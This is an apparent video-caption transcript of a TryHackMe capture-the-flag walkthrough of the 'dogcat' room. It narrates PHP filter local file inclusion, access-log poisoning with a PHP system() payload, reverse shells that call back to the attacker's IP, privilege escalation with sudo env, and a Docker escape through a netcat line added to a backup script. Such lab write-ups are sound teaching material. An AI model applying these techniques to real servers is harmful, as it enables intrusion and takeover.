TryHackMe! DOGCAT - PHP Filters for Local File Inclusion

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hello everyone my name is John Hammond and this is another Troy Hackney video today I want to be showcasing the dog cat room they came out just a few days ago right I think it was actually like April 17th and the time recording is April 22nd so we'll see how we do it looks like we have to join this room I've got it up here on my screen and I believe this is a free room so we can access it totally just fine I'm connected with my John Heyman YouTube account that is free and I guess I should clear out some of the stuff from my other video my bad trying to knock a few out today I trying to get trying to get back to it so let's make a directory dog cat and let's head over there let's sort of readme file so we've got some notes that we can keep track of and I'll call this dog cat the IP address I just like to keep track of as a little environment variable or just a variable that I could use and reuse pretty easily so let's go ahead and do this it says I made a website for viewing cat and dog images with PHP if you're feeling down come look at dogs and cats the machine may take a few minutes to fully start up okay so not a whole lot of answers or guided I guess I'll walk through here it's more of a challenge room it says what's flag one what's flag two its flag three what's flag four so we are just off the races kind of on our own so let's do our own thing let's uh let's go see if this machine is up I guess all pinging this guy let's export this guy that and then let's ping our IP address good is he up and available he is okay dog cat a gallery various doggies there cats what would you like to see I'd like to see a dog please Oh oh this is wonderful how many dogs is half oh my gosh this is the real YouTube content you guys came for have we got a cute cats my girlfriend I are gonna get a dog we are that's a ginormous image oh yeah I don't want I don't want that that's not a dog that's just white space we want to get ashy but you knew okay let's go find out what's really going on here if I look at the URL we've got view equals dog which is kind of peculiar because maybe we could view some interesting things the view looks to be a variable which seems to be being set to kind of our option here if I set it to a dog or a cat maybe we could view maybe the home page like index only dogs or cats or loud that's annoying cat dog those work what about I guess I can't like you can't do some local file inclusion all the way up to it cetera password in this case because I think it's probably adding a dot PHP extension on here so what this is doing though if it is adding a PHP extension what we could abuse are some of the PHP local file inclusion tricks and techniques where we can say PHP LF I filter because we could supply a filter for what we might be looking for and that way we won't have it interpret the actual PHP tags we could perhaps include a any resource that we really really wanted to and encode it with base64 so that way what it's encoded in base64 we won't see the real basics real PHP tags being interpreted and evaluated by the server will see them as text that we can go ahead and manipulate and access so let's just steal this syntax I always go to this resource I always have to Google find it payload all the things has it just as well but I always end up looking for that I don't play darts comm application security site so let's try to view that syntax for a PHP filter convert base64 encode and I probably should have got the rest of it there I need to specify a resource yeah resource equals and then what we want to actually see so resource let's try it for dog and it looks like we have some base64 encoded so that would work for us let's go ahead and echo that base64 string into our base 64 decoder and it says image source dogs and a random okay it looks like there are 10 images and they're all JPEGs ah interesting let's see if we could actually access that index dot PHP now only cats or dogs are allowed um can i does dog have to be included in that how does that work maybe if we ask for dog but we also went to a parent directory so we were to move up could we still access index oh yeah okay so index up PHP now has all of that so let's try and echo that into base64 tag D cool okay so now we have the PHP source code let's redirect this to an index dot PHP and let's go ahead and subol that so we can see it with real highlighting view cat or dog just as we saw and it has to contain the string dog or cat return string position it gets oh it also includes the extension if the extension is set with a get variable oh we can control that it will use that otherwise it will specify dot PHP oh okay so we could access a lot here because if we can control the extension and it's not going to add anything else maybe we could verify anything that we could read out anything that we particularly wanted to let's try that we could oh it needs to have dog in the string write an extension could be anything it will include it so without using our filter now that we've got the source code of the page maybe we could include dog up up up up up to etc password and let's actually use the ampersand to specify X ext should be nothing and there we go now we've got a separate password so we could potentially leak out any files that we wanted to maybe because we have local file inclusion maybe we could access the log file of this web server and see if it's seeing our requests or what headers are included because maybe we could actually get our own PHP code executed we want to elevate what we have from our local file inclusion exploit or this vulnerability and leverage it to remote code execution so we could do some more dangerous stuff maybe get control of the box so where would that be var Apache access not log nope okay that's not it is it httpd now we have to try and determine where we're actually seeing our logs Apache log files var log httpd access log access underscore log bar log probably need access dot log nope Apache - oh okay there we go var log Apache to access log now we have a lot of results we can actually see all of our attempts here so far view dog etc etc etc and it includes our user agent my face is in the way so you can see that here with any of these actual user agents that I'm supplying is that it is keeping track of the syntax and if we were to specify our user agent maybe we'd be able to actually specify our user agent of PHP code that we would want to execute if we were to load this page maybe it will actually go ahead and execute that for us let's try this I'm gonna actually do that in curl I'm gonna have a separate request so I can kind of make that smart for me I'll go to this page just getting the URL itself I will include my user agent as a header for curl with the tech capital H argument and we're gonna include PHP syntax in here so it's gonna be wacka-wacka per question mark PHP right because it's the opening PHP tag and then we'll run the system command and we're gonna end up doing this with an argument that can be passed to the web server so I'll use that HTTP GET variable the way we can access that is with a PHP variable but the PHP variable is prefixed with the dollar sign the same one that Bash uses so if we're using a double quote here we need to go ahead and escape that string with a backslash so that way it'll be able to say user agent equals PHP System backslash dollar sign and I'll use get with the underscore here and I'll supposed to Phi C as the name of my string and the argument that I want to use I'll close the parentheses to the system call and that and then I'll close the PHP tags and and my double quoted string so now when I go ahead and run this it should return just the page here just the index that we were requesting is the home page but we should have placed this user agent into the Apache actual access logs that we were able to see with our local file inclusion so because that can read those PHP tags it'll execute PHP and potentially allow us some command execution so if I go back to my web browser we should be able to see this I'll go ahead and refresh the page and looks like we have a lot of Corrick west's okay peculiar and system says it cannot execute a blank command that's good because we haven't actually supplied that C variable whatsoever so I you might you might notice I had to clean up this page I reset the machine a lot my IP address is different because I broke it because when I was trying to get the syntax right PHP would whine it would get an error and then once you get an error with this kind of Avenue this this route that we're taking this attack vector is once you Bourque the access log if you have a PHP error and won't return to you whatsoever and well now you've completely screwed yourself out of this potential attack vector because you can't get any more PHP in that code because every time you try and read this file it's gonna break so that's the potential danger and risk in doing this technique but now we finally got it right system is gonna be able to execute some commands if we were to supply a C value so I'll try and go ahead and supply as HTTP variable I'll use my ampersand here C equals ID and now we can actually see the output here we have dub-dub-dub data dub-dub-dub data etc etc etc so now we have code execution we've leveraged our local file inclusion to remote code execution so let's see if we can take this technique and go ahead and get a shell so what I'm gonna do is I'm going to start a little netcat listener I'll use netcat - LM VP 9999 just called 9 should work for us and let me just kind of verify that I can get to it I'll go ahead and check my IP address so Showtime 0 I am 10 8 9 12 I'll just steal that out here and I'll see if I can run that command 9 9 9 9 and looks like it didn't go through to me do I have the netcat command available we don't really know so other options we could try our using the Bosch technique we could try using Python as our verse shell so let's go ahead and go down some of those routes let's go to pen test monkey reverse shell cheat sheet let's grab a Python one and just for syntax wise let's see if we can actually get output from Python I use Python taxi I will do print hello or just a lot of a's actually so we'll see if we have that output seemingly not we can try that with Python 3 still nothing so no output from them I guess we don't have that we could try bash taxi echo a so maybe we'll hide be able to execute bash looks like we can in that regard so we could try that bash reverse shell just to try it just to see we might not actually get anywhere with that but I think it's worth to try cuz Python didn't seem to work out for us so let's go ahead and modify this string and I do want that IP address 10 8 9 12 and we're listening on 9 9 9 9 so let's go grab this string trying to see if we can actually execute that maybe not through the browser but hey we'll give it a go looks like that failed didn't go to our reverse shell we could try this with the curl we could try with requests just to kind of check all of our dots I'll try that because uh this is kind of new I haven't I haven't particularly done this room just yet so forgive me for kind of waiting in the dark let's go ahead and access this page I don't need that all that syntax here but I do want to go ahead and specify these as arguments so we just want to get that URL and we'll say params because we'll pass these all as get variables too with a URL requests so you can go ahead and equal that extension can equal nothing because we're supplying our own extension and let's just say si can go ahead and equal our shell command let's see if that will work for us so we do need requests to be able to do this in Python I will import requests and I'll do R equals requests dot get on the home page with our params equal to the params I'll try and run this seemed like it came through and no shell okay so I don't have a reverse shell just yet what we could try and do is leverage this out - maybe stage our own PHP reverse shell we could go ahead and simply echo a and just a test and make sure we can write and read things let's just call a little test file let's try to run this and now if I go ahead and access this log file let's change that command to actually cat out test okay now we have that a variable there so we could potentially build our own PHP shell with maybe some basics before repeatedly adding things so let's try this let's get a PHP reverse shell I think I still have mine I think I still have a copy opts PHP or virtual yep let's just call this a shell dot PHP in our current directory so let's modify this so we have our own IP address 10.8 9.1 12 is that right I think that's me I hate when I repeatedly forget these but it happens to me all the time 112 and let's go to poor nine nine nine nine nine nine nine so let's go through every single line in here let's actually clear these comments out because I don't care about them all that much so and let's let's actually echo each of these and start to build them into our script so let's let's let's build it out onto the filesystem and I'll show you what I mean let's go and kind of modify and make make these go away so we can verify we can read our own shell so let's do with open shell dot PHP as a handle let's do handle dot read lines and let's just say let's let's grab base64 in here so we can go ahead and pay sixty for encode some of these things let's say lines can equal read lines and let's actually strip out all the new lines from the salty X dot strip for X in our handle read lines and now let's actually basically for encode these so let's do that just in the while loop so we can go ahead and print the lines that we have all as an array BX is not if I'm sorry yep I don't need that be in there looks like we have all of our lines as a array or a list so that's good let's try to change this so that we can base 64 the be 64 encode each of these and now they're all based 64 lines so that works well for us so now what we can do is we can actually make these arguments real for us and for line in all these base64-encoded lines let's specify the parameters can actually equal echo the line and so I'll use a percent here actually I'll just use format because I think Python two has that format right sublime text is setup with Python two right now so I know you'll hate me for using Python 2 but that's that's just where we are basics T for line into and let's add it into web shell dot PHP and let's include that so we do that repeatedly repeatedly repeatedly so we could build our shell and then after that's built let's go ahead and we should verify what directory were in before we go through with this okay we are in var dead bit of HTML so when we create a file with the PHP extension in the current directory it will go ahead and add it and make it publicly accessible for us so we can reach our virtual and pull that back so now after that let's go ahead and base64 tack D Reb shell PHP because that's the file name that we've created and let's redirect that to shell dot PHP so now we are adding every single line into a Reb shell that PHP file that will are originally base64 decoded then we'll go ahead and base64 decode that shell so we have a shell dot PHP which is the raw PHP file if we go ahead and request that eventually we should be able to go ahead and see okay if we echo or LS that shell dot PHP it should exist for us just by simply running our script and we'll have our reverse shell let's try it sending a ton of requests to the web server building out our rev shell dot PHP file re naming that or at least base64 decoding it so eventually we do have shell dot PHP none of these are they being executed yes they are because we're requesting that page just trying to think in my head like is this a valid technique will this work for us to get our reversal taking a little bit of time I don't know how long it'll take so we'll pause okay finished in just under an hour so if we go back to our page let's LS shell dot PHP which does seem to exist if we were to verify that our netcat is still running what we could do is we could go to shell dot PHP and called undefined function in PHP set time limit on that guy so our set time limit must not have worked are we missing a newline there maybe that's the immediate function is failing so I guess that doesn't work well for us if I echo nothing to base64 decode does it work yeah okay maybe we could change this up in base64 decoded as we're developing the script so let's RM Rev she'll go back to our command to remove Rev shell dot PHP well if i LS okay I have shell up PHP which we know is broken in a Rev shell which we'll need to add so let's go ahead and build this all out base64 decoding that output and adding it in as needed it's a weight again okay another one that took just a minute our red shell should be created so we should have Rev shell dot PHP there it is let's verify that Rev shell let's just cat it out and that is also removing our whitespace why does it do that that's not adding a new line we could try to echo an empty line into rev shell dot PHP let's try up okay now that we've added a new line let's go see if we can actually see that in our rev shell dot PHP seemingly no new lines let's try and run it regardless let's go - Rochelle dot PHP and that's loading and failing on line 95 okay okay let's try another Avenue do we have W get to be attack H no Curl Curl Tech H Oh looks like we have curl okay maybe that will work let's spin up a server Python Tech M HTTP server good and then let's go ahead and RM shell dot PHP if we still have it and let's download our curl - what is curl to download to a file I think it's just tacked Oh taco yep okay so curl HTTP colon : 10.8 9.1 112 port 8000 shell PHP and let's redirect that to or output it sorry with taco shell dot PHP so looks like okay retrieved it and now we should have a shell dot PHP that we should be able to access that looks like it connected okay excellent finally we have a show let me stabilize this shell do we have Python taxi I don't know why it shows LS to work we don't have Python to be a Python 3 Python 3 is also not found okay so I guess we don't particularly need to stabilize the shell I guess we'll be working clearly export term equals X term now if I clear okay is good let's see what we got now we're moving around the filesystem we were in VAR dub dub dub HTML and when I saw the output earlier I saw a flag dot PHP so let's just cat that out okay there's our first flag we can go ahead and submit that and now let's go navigate around the filesystem do we have netcat we don't have net cat huh well let's just count flag - that has that strange name so let's cat that out hello Phi to RCC yes thank you we did that eventually I don't know why we what's Flag 3 so let's try to prove ask we don't have netcat we know we have curl so we could download a little Lindy's let's let's move or copy or opt Lynn peas into this directory and let's move into Devi's hm can I run bash that was a stupid idea oh I am in dev sh m so I'm just fine I guess now I just no longer have a prompt because I ran bash stupid me if I exit bash okay good I'm back in my my thing now that we have dev sh m and we've got lint peas over in our web server let's go ahead and curl that so HTTP 10 8 9 1 1 to 8,000 and it's Lindy's Sh so I'll save that as Lynn peas dot SH taken to sweet time looks like he's got it so let's mark that as executable and now let's run Lynn peas SH and we'll t that to lim log just so we have a log copy of it and I cannot why can I not execute that I made it executable that's weird to me cattle Indies is that not all of it okay I guess we'll do some manual enumeration what can I run a pseudo ah env what does that let me do oh it just displays everything can i GTFO bins that GTFO bins github env oh you just pass it as an argument so to go okay let's sudo that again and let's bin bash to get regular bash and now I'm route I probably didn't need to do root or bash so I would not have a shell let's just do BN SH so I have my prompt back or I just don't have my problem whatsoever that's totally fine let's go check out the root directory and there is Flag three so let's cut that out different environments what is that referring to is this is this hell let's take away we are at a doctor environment okay so what it's a different environments I was kind of curious did it put us in a docker container and I guess we are in a docker container so that doesn't particularly help I guess we can look around and see what else might be odd without using limpy's maybe Lindy gnome would work or whatever the case may be oh bob has something called backups now let's back up data sage backup that or do we have that as a crontab tacky oh we're in a dog fur container so it probably can't see that tar x z VF backup that's our oh okay so it starring the entire container oh and it is checking out that backup script so it might be running that might be doing that what is a backup that is aged and cat backup Don SH looks like it is touring something from outside of the container okay awesome and that container must be the mounted to kind of share that we're in so what we could do is add some other netcat reversal syntax or maybe maybe bash or whichever one might work let's try with netcat let's get this guy to see if we can get break out of this container let me not get tell on VP 888 and let's modify this to now bring me to ten 89.1 twelve quad eight and maybe if that is actually being ran we could get some stuff there's no super special characters in there so let's add that to backup dot s age okay what is that root oh no that's directory that was just made when I unn tart it so how does backup goddess H look right now now it tours everything and has a net cat command to call back to me that better be the right IP address it is okay so I guess I'll wait a few minutes and see if I get a shell back kind of drive and blind here we could try the bash technique as well like if that command fails then oh oh oh oh it worked okay so now we're in the real file system and we have Flag text nice nice okay cool wow that took more than it needed to to get that done but okay that was dog cat so finally did it right so a little bit of recap right we found the web page that was seemingly doing some file inclusion to be able to read a dog or a cat and we can abuse that we it was limiting our file extension that we didn't know admittedly at first but once we found that okay we could do some local file inclusion with the PHP filter technique that way we could read the source code of the pages and we could see that we could specify a file extension if we didn't use the file extension and we left it empty so we could supply our own in the file name then we would have our any any actual like local file inclusion that we wanted to not just strictly limited to PHP files so we could pull up cetra password so we could see the access log for Apache and the web server and that was the goldmine because then we were able to actually inject some PHP code in and get remote code execution because PHP will execute and it's server-side so PHP would allow us to put some commands in and run our own commands and we tried some techniques I was bumping around trying to okay pull in a reverse shell maybe echo one with with stupid echo base64 techniques and then eventually we just curled one down and was able to pull one down off floor on a web site that we hosted so that was kind of neat and then now that we had the reverse shell we try to pull some other things in to get limpy's some manual enumeration working or automated enumeration working and that didn't work so we opted for our manual enumeration we could see that the doublet of data user or the user that we were running currently was able to run the env command or the environment command as route with sudo so we were able to use gtfo bins to see that as a premise we could just simply fire up a root shell and we can escalate problem is we were still trapped inside of a docker container so we saw we found we discovered that backups directory that was pulling some information in and out and running it manually on the host and that was fantastic because that gave us a route to get out of the docker container and actually get command execution on the real machine on the host itself and that is what that backups dot SH allowed us to do eventually it called back maybe that's running with a cron job or some scheduled tasks but with that we could find the fourth flag and we had root on the actual computer itself so holy crap long video a lot of mistakes a lot of learning I hope you guys enjoyed this video if you did like button comment button subscribe button you know the drill thank you guys thank you so much for watching I'll see you the next one take care

Info

Channel: John Hammond

Views: 72,980

Rating: undefined out of 5

Keywords:

Id: u_uuk7FWWF4

Channel Id: undefined

Length: 32min 4sec (1924 seconds)

Published: Thu Apr 30 2020